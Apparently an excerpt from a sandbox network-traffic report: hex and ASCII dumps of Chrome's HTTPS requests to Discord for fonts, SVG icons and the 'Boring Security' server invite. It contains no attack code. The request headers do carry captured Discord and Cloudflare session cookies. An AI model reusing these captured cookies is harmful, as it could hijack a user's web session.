                                                                          2023-12-10 16:45:25 UTC1110INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 37 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 62 63 38 35 33 32 32 38 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: font/woff2Content-Length: 39764Connection: closeCF-Ray: 8336f54bc853228d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Con
                                                                          2023-12-10 16:45:25 UTC259INData Raw: 77 4f 46 32 00 01 00 00 00 00 9b 54 00 11 00 00 00 01 7d 10 00 00 9a ee 00 02 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 04 1b 81 a6 7a 1c a0 20 06 60 00 8e 50 08 82 44 09 8d 57 11 0c 0a 83 9a 1c 82 de 53 01 36 02 24 03 99 60 0b 8c 72 00 04 20 05 94 06 07 b4 46 0c 83 3d 5b aa 57 91 00 69 72 9f 68 d3 0d 0e ba 0d 01 2c f5 ae a3 2e ff 8a 6a f0 e6 a9 49 6e 1b 58 f6 cf 1f 1b 55 6a 0d 9e 33 a4 df ed 60 4b 5c 74 d0 ec ff ff ff ff f4 a4 22 c3 25 c5 a5 5d 07 00 70 10 cf 45 af b6 dc c3 a8 81 ac b5 a1 47 0e 15 39 26 72 a8 14 ec 53 9b 2b 9a 72 a1 35 1a cf d0 84 cd 7e 60 a7 83 a2 bc ed 53 27 fb 97 31 7e 9e 61 d5 ea 86 48 9d 9f a3 53 88 ae bc 8c 97 b9 1c fe 18 4e ae 74 58 32 47 37 05 75 d5 fc 6d c4 7a a0 21 83 06 89 16 08 be f9 29 ac 77 0a
                                                                          Data Ascii: wOF2T}Bz `PDWS6$`r F=[Wirh,.jInXUj3`K\t"%]pEG9&rS+r5~`S'1~aHSNtX2G7umz!)w
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: b8 9b 2e 9a 3a fd 36 09 c7 57 04 5c d8 a0 2b c8 1d 6a 0a 4b 94 c6 ee 89 5b 7c 88 6e ca ec ad 64 67 8d 98 e1 b4 ff ba 4b 78 3a 3b c2 f1 d6 89 da 37 3f 32 83 6a d0 ab fa 5c 13 01 91 30 ff 99 3d 7a 64 b7 28 e8 bc b2 d2 dd 9b 7b c9 63 b3 86 e2 f6 f7 7d 8b 5f fa b8 51 d4 a3 d2 d9 8f 94 c6 64 55 78 b7 e1 03 a6 62 de 5c 59 2c de fc a9 0e 12 a9 fb fa 8f 57 d7 b6 62 b5 7a 6b 41 58 82 2c 15 f4 58 cc a5 e0 6a 4f 97 e5 2a 77 2e ed 25 20 8e 5b 8f a0 44 44 b4 58 b6 11 47 5c f3 fa 3f a2 39 9b d9 bd 5c 2e 47 e4 2e f1 23 88 05 09 54 20 ad 87 22 81 24 10 5a ea 50 81 aa bc 57 9d 9a 2a 35 a1 62 94 1a 5f 11 a5 9a ff d5 a5 92 7d 61 74 da ca fd b5 0b 40 32 c8 41 92 8a f2 d1 f3 6d 99 0a bc 35 4f 79 9d f6 ef e2 65 bb 61 e9 b0 e3 9a b1 f3 81 44 fe c1 ff 27 99 73 f1 24 7f aa b2 51
                                                                          Data Ascii: .:6W\+jK[|ndgKx:;7?2j\0=zd({c}_QdUxb\Y,WbzkAX,XjO*w.% [DDXG\?9\.G.#T "$ZPW*5b_}at@2Am5OyeaD's$Q
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: b1 59 25 86 20 0a 11 44 24 a6 5c a9 af eb 66 cb bc 3f d5 82 77 86 93 7b f5 35 a4 75 1c 9b 65 c0 48 20 81 c6 04 89 f1 ee eb 88 67 df 51 8a a3 1c ce 42 21 61 db f6 72 f6 e6 ff 55 86 43 3f 0f 90 e8 ff f7 63 40 00 94 00 00 00 10 92 a1 24 83 a4 68 06 c9 d3 0a 52 60 04 64 94 51 90 31 36 43 b6 2a 87 dc 71 07 72 4f 05 c8 77 69 01 e5 31 0d d4 a5 2f 68 2f 43 41 fb 18 0e 49 1b 3b 98 33 34 b4 0e f9 40 eb 91 2f 58 af 02 c0 fe 2e 04 ac 6f e1 60 83 c3 81 0d 2f 1a 6c 6c b1 60 53 4a 04 9b 5e 2a d8 ac b2 c1 16 94 0b b6 a8 7c b0 e5 95 80 ad aa 1c 6c 5d 35 60 9b ab 07 db 5d 33 d8 de 5a c1 0e d4 01 76 a8 2e b0 53 fb 09 2b 59 1f ec fc 86 60 97 36 0a bb ba 71 58 f9 e6 61 f7 b7 04 7b b6 0d d8 eb ed c3 3e ed 10 f6 75 c7 b0 6f 3b 85 fd d8 05 ec f7 ae a0 3c 20 1e 24 3c f0 48 44 e2
                                                                          Data Ascii: Y% D$\f?w{5ueH gQB!arUC?c@$hR`dQ16C*qrOwi1/h/CAI;34@/X.o`/ll`SJ^*|l]5`]3Zv.S+Y`6qXa{>uo;< $<HD
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 87 14 f2 28 5b 06 9c d0 d9 b0 1a 95 86 79 7c b2 7f d2 a2 9c 1e 54 99 96 3c 87 c0 c7 9a 35 80 00 65 f2 2a b0 2f c2 dc 7e c2 4a 5f c1 80 f9 12 0f f7 d8 47 d2 4a 24 94 50 64 b5 19 5a ba 07 01 4c 9f 7c a3 04 fb 14 d5 52 94 74 59 08 b1 f6 67 0b b0 c8 d0 91 c6 0f 69 a7 57 bf 1a 11 b9 83 ec 0c d2 88 9b db d9 57 e1 b0 82 cd da 4d 1b 3c 58 00 03 1a 72 0c a3 e4 dc 63 98 60 86 7d 1b 23 36 c6 51 ff 82 8d ab 18 6d 2e b3 2f 5b 97 05 e8 9b ae 8c 1c 7a fe 17 70 f9 08 9b 87 63 c5 91 18 50 28 32 ac 63 71 7c 33 55 30 a2 8d 81 35 be 88 70 80 00 38 e1 11 2e 9f a5 1f 38 d5 7f ac 62 05 8e f7 4c d5 ba a0 73 88 a9 fa a4 8d 93 0f a7 ef 03 e5 30 36 d1 ea 45 02 bc c5 ce ad bc 2a 39 3e 0b 3f 49 50 d0 cd 65 71 76 1d bc 59 ea 6d d7 88 fd d3 c4 b2 49 0c f4 2b 12 42 84 39 45 d6 92 b9 61
                                                                          Data Ascii: ([y|T<5e*/~J_GJ$PdZL|RtYgiWWM<Xrc`}#6Qm./[zpcP(2cq|3U05p8.8bLs06E*9>?IPeqvYmI+B9Ea
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 2c 58 b3 33 74 84 43 b0 2a 04 ba 23 70 6c 22 8c d4 5f af 79 03 20 ac 67 1b 68 aa df 6d b6 0d 49 9b 6f 98 9e e6 5f 40 41 05 17 12 b6 e7 85 f5 a2 f0 22 7a 15 ae c8 de 14 15 be e8 62 4b bc 88 a4 b9 3d a3 cc b2 ca 46 c3 28 b9 7e a4 b9 bf ba 1a 7b 5d 9f 03 aa 07 02 4c 9a 67 7e ae ef b2 11 4c 9a 6f 98 d9 ec e6 34 ef fd b3 bf 5b 34 6c 00 69 d4 1b d1 82 78 b3 05 f5 55 0b f4 4d 16 12 e7 88 f1 59 8d 85 33 2a 52 2c 82 d4 ce b6 1b 8d ae 1a 09 3a 15 2a 53 03 c8 96 7b 27 98 d1 13 e2 6a 8e 41 57 7a 23 63 33 c6 18 6b 71 a7 3c c1 37 64 7d 77 e4 f5 73 82 c8 e8 76 70 10 67 73 0c 84 ba 19 8d 8e 9c 50 c8 40 01 3b 5e 30 a2 29 7d ef 2b b3 51 6f f8 0b 3d 55 a5 75 65 a4 2a 36 e5 09 54 99 d2 d6 a9 4d e4 eb e5 ce 15 d9 21 39 3a 5d b7 8d d4 8f 48 08 e6 31 73 c0 87 68 e1 28 ce 07 92
                                                                          Data Ascii: ,X3tC*#pl"_y ghmIo_@A"zbK=F(~{]Lg~Lo4[4lixUMY3*R,:*S{'jAWz#c3kq<7d}wsvpgsP@;^0)}+Qo=Uue*6TM!9:]H1sh(
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 6b ad b7 d1 66 5b 6d b7 d7 7e ff 77 80 a0 8e b9 09 47 1f 43 9a cb 71 93 72 4c 64 9c b7 8b dc 85 1f 29 d2 6e 92 8d ab 1b 8e bc 33 be 8e 8a fa a6 62 7c 5f f1 7e 68 02 32 1e b2 23 b9 ad 0f ef 3b 04 44 d9 e8 04 7b 0d 28 04 41 a9 28 13 a2 83 f4 af 99 f8 c8 57 0c c6 24 80 11 8c 6e 52 99 8a 59 d5 d5 fa be 9a 9a 18 d5 52 1f 8b 28 5d 90 6c 75 1e e8 1d dd b0 ea 26 2e 41 9e 97 8e 96 9c 86 9a 18 99 db 0d c3 4c 04 1e 4e b1 37 b2 44 23 14 c8 f0 e0 45 09 5b 82 01 0b 01 29 c1 0e 08 86 57 6a fa 6e aa 2c 2a c6 2a 1a 46 9c 96 8f 01 08 18 47 a6 98 34 5a 10 53 38 27 18 a3 0b 10 d8 4d cd c4 2d 92 9f 5c cd 83 55 35 46 fc f0 e1 7d 16 15 9e 52 30 8a 84 47 2e 26 37 21 30 26 07 21 30 26 fc 98 96 f3 be f8 48 22 41 c8 54 4c 57 ff 94 f7 61 60 14 eb a5 30 38 c2 07 2b 91 4b 1b 6c d4 1c
                                                                          Data Ascii: kf[m~wGCqrLd)n3b|_~h2#;D{(A(W$nRYR(]lu&.ALN7D#E[)Wjn,**FG4ZS8'M-\U5F}R0G.&7!0&!0&H"ATLWa`08+Kl
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: a6 b4 74 d7 86 59 bd e6 99 a8 96 9f af e4 08 99 24 cd da 77 96 46 ed ae aa f7 2b fa 74 c5 dd a8 e3 e1 58 45 c4 8a 86 09 ee 52 c1 43 5b 25 89 f1 f1 e7 26 7e ef 7e 4c f1 d7 13 17 97 34 de bf d7 f8 01 1a 7e 9c eb 53 86 da 83 3e af a0 14 ca c4 f1 51 be 5e 94 a7 4b 87 1f d1 a6 c5 ca 9b 04 33 6b 33 1d 96 b9 77 e2 81 23 1e 9e 84 61 5f 7a 3e 3d d6 3c 99 e8 99 a5 58 ba 35 ee 7a 56 74 d3 a6 e5 a5 d2 9e bf ba fa 89 f1 2d 6f 8a 75 cf b7 d3 df ef ce 69 d7 10 b0 e2 b6 6d 73 01 5c 1f 14 f0 a8 2f 46 78 58 39 4d 19 29 4b aa cb 2b 7a 98 6e 3d 85 08 49 88 3d d7 eb 5e aa 64 af 16 d2 81 6e a7 4a 1d 9e dc db e3 58 9c cc ae d4 d4 bd 91 5b 93 2e c5 99 a3 ce af 25 ae 41 f7 8e 27 ae af 18 7d c7 a7 5f c6 3e f8 54 55 49 49 66 7d 33 22 d0 38 8a 12 2f fa f2 c8 15 41 82 d3 e2 40 7d 66
                                                                          Data Ascii: tY$wF+tXERC[%&~~L4~S>Q^K3k3w#a_z>=<X5zVt-ouims\/FxX9M)K+zn=I=^dnJX[.%A'}_>TUIIf}3"8/A@}f
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 2a cd 6f 38 03 a0 e3 5b ff 25 82 36 e7 18 02 41 bf 33 f4 15 f4 8c 7a c0 e6 c4 6e cb bb db 67 31 14 23 a5 90 42 0a 14 21 64 83 51 34 a3 18 8f 4c fa 6f 50 90 fd 8a 4e 67 45 d0 c0 52 83 7e 64 f6 a8 75 c0 c4 c0 55 5e f6 2c 6c 65 51 39 cf f6 d2 b6 a5 a8 0b 19 9d e0 6e c3 b2 77 fd 55 01 ed 64 f2 c8 61 2e 40 d4 4d f5 46 0d 4d 43 99 c5 9d 0b f8 33 3c 9a b9 d0 7c 80 b4 93 9d 6d 98 72 31 f5 9c 7c ab 38 71 31 60 24 27 4a e3 c3 77 9b f2 99 a6 29 a4 43 33 a1 e7 c8 6d 50 91 4a 8a 55 4d f5 a6 fc 9c c5 b6 ab ac 4a 43 73 4e 69 74 03 f5 74 4c a9 6c f7 be ac 4a 03 72 22 ff 0c e8 33 1f 35 76 5f 16 b9 00 06 e4 2e f5 70 78 34 80 f6 32 90 5b 27 90 fe 79 f1 df b6 7f ca b8 29 4b 3e 90 28 7a c4 14 98 62 aa 08 1f b9 75 f3 54 07 e3 eb c6 b7 bf 81 9f bc 88 3a 53 83 a6 95 7a 84 24 f5
                                                                          Data Ascii: *o8[%6A3zng1#B!dQ4LoPNgER~duU^,leQ9nwUda.@MFMC3<|mr1|8q1`$'Jw)C3mPJUMJCsNittLlJr"35v_.px42['y)K>(zbuT:Sz$
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 31 02 23 31 0a a3 31 e6 f7 8f 85 38 c4 54 88 8b ed 25 73 96 0d 56 59 e8 db 55 38 db 46 ab 2d 32 a1 70 8e 4d d6 58 ec bb c2 b9 36 fb d1 12 09 85 f3 6c b1 d6 52 df 17 ce 97 e8 27 3f 98 58 b8 c0 56 eb 2c 33 89 8e 7a e4 42 db fc 6c b9 c9 76 7b fc ed 02 56 98 02 eb 4c eb ad b4 c0 78 e3 20 d0 26 92 46 0b fe 34 7b 25 7a 10 43 81 bd 2c e6 53 5c f8 0c 37 52 fb 41 ba d5 50 cb 27 b9 e6 97 79 f0 28 c4 8d b2 b5 3d 4f 21 63 d0 ce 52 ce 31 a1 1f 1c 3a 99 37 04 1b 0e fc 93 56 1d b9 ca 6a 6b fc 78 73 c1 f6 7a a7 1a 3d 4e 54 5a 4e 79 14 bb b5 da 4f 1e c9 ef 19 16 79 2c 44 cd 32 ca f9 3e d0 6c bd a5 71 a0 d2 97 0e a1 51 2c 24 19 52 7a 7a 90 5c e9 43 f2 64 00 c9 07 82 39 f3 e2 b8 3d 91 8f 3f 3b 6f 2b a7 27 2c f7 63 b7 87 cb dd 0b ce e7 ce 0c a6 c8 9c 91 01 e4 d9 e9 74 80 ec
                                                                          Data Ascii: 1#118T%sVYU8F-2pMX6lR'?XV,3zBlv{VLx &F4{%zC,S\7RAP'y(=O!cR1:7Vjkxsz=NTZNyOy,D2>lqQ,$Rzz\Cd9=?;o+',ct


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          379192.168.2.550117162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC783OUTGET /assets/1af9bdf041e000508e41.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
                                                                          2023-12-10 16:45:25 UTC964INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 63 37 65 30 35 62 33 65 62 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 137Connection: closeCF-Ray: 8336f54c7e05b3eb-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 77 69 64 74 68 3d 22 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 20 32 68 32 76 38 68 2d 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          380192.168.2.550116162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC783OUTGET /assets/7442b576347c1d02886f.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
                                                                          2023-12-10 16:45:25 UTC958INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 63 61 38 30 39 37 34 61 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 395Connection: closeCF-Ray: 8336f54ca80974a4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC395INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 39 33 32 20 37 2e 34 39 37 32 37 43 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 37 2e 34 39 37 32 37 20 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 32 2e 39 39 33 32 43 37 2e 34 39 37 32 37 20 31 2e 38 34 34 32 31 20 37 2e 30 36 37 30 34 20 30 2e 37 39 35 37 30 38 20 36 2e 33 35 38 38 39 20 30 43 39 2e 35 30 35 39 35 20 30 2e 31 38 38 33 32 33 20 31 32 20 32 2e 38 30 30 31 38 20 31 32 20 35 2e 39 39 34 35 36 43 31 32 20 39 2e
                                                                          Data Ascii: <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          381192.168.2.550118162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC819OUTGET /api/v9/invites/boringsecurity?with_counts=true&with_expiration=true HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
                                                                          2023-12-10 16:45:26 UTC771INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 63 63 62 39 65 37 34 38 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeCF-Ray: 8336f54ccb9e7482-MIACF-Cache-Status: DYNAMICStrict-Transport-Security: max-age=31536000; includeSubDomains; pr
                                                                          2023-12-10 16:45:26 UTC598INData Raw: 33 64 61 0d 0a 7b 22 74 79 70 65 22 3a 30 2c 22 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 65 78 70 69 72 65 73 5f 61 74 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 73 22 3a 32 2c 22 67 75 69 6c 64 22 3a 7b 22 69 64 22 3a 22 39 33 33 32 35 33 33 32 38 37 39 34 36 38 39 35 34 36 22 2c 22 6e 61 6d 65 22 3a 22 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 22 2c 22 73 70 6c 61 73 68 22 3a 6e 75 6c 6c 2c 22 62 61 6e 6e 65 72 22 3a 6e 75 6c 6c 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 63 6f 6e 22 3a 22 39 62 30 61 64 31 61 37 61 32 63 39 31 31 36 38 34 61 30 65 37 65 36 65 31 65 37 62 63 65 32 65 22 2c 22 66 65 61 74 75 72 65 73 22 3a 5b 22 50 52 49 56 41 54 45 5f 54 48 52 45 41 44 53 22 2c 22 4e 45 57 53 22 2c 22 54
                                                                          Data Ascii: 3da{"type":0,"code":"boringsecurity","expires_at":null,"flags":2,"guild":{"id":"933253328794689546","name":"Boring Security","splash":null,"banner":null,"description":null,"icon":"9b0ad1a7a2c911684a0e7e6e1e7bce2e","features":["PRIVATE_THREADS","NEWS","T
                                                                          2023-12-10 16:45:26 UTC395INData Raw: 4d 53 22 2c 22 47 55 49 4c 44 5f 4f 4e 42 4f 41 52 44 49 4e 47 22 2c 22 53 45 56 45 4e 5f 44 41 59 5f 54 48 52 45 41 44 5f 41 52 43 48 49 56 45 22 2c 22 41 4e 49 4d 41 54 45 44 5f 42 41 4e 4e 45 52 22 2c 22 56 41 4e 49 54 59 5f 55 52 4c 22 5d 2c 22 76 65 72 69 66 69 63 61 74 69 6f 6e 5f 6c 65 76 65 6c 22 3a 32 2c 22 76 61 6e 69 74 79 5f 75 72 6c 5f 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 6e 73 66 77 5f 6c 65 76 65 6c 22 3a 30 2c 22 6e 73 66 77 22 3a 66 61 6c 73 65 2c 22 70 72 65 6d 69 75 6d 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 63 6f 75 6e 74 22 3a 32 34 7d 2c 22 67 75 69 6c 64 5f 69 64 22 3a 22 39 33 33 32 35 33 33 32 38 37 39 34 36 38 39 35 34 36 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 7b 22 69 64 22 3a 22 39 33 33 32 35
                                                                          Data Ascii: MS","GUILD_ONBOARDING","SEVEN_DAY_THREAD_ARCHIVE","ANIMATED_BANNER","VANITY_URL"],"verification_level":2,"vanity_url_code":"boringsecurity","nsfw_level":0,"nsfw":false,"premium_subscription_count":24},"guild_id":"933253328794689546","channel":{"id":"93325
                                                                          2023-12-10 16:45:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          382192.168.2.550119162.159.130.2334435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC643OUTGET /icons/933253328794689546/9b0ad1a7a2c911684a0e7e6e1e7bce2e.webp?size=64 HTTP/1.1
                                                                          Host: cdn.discordapp.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
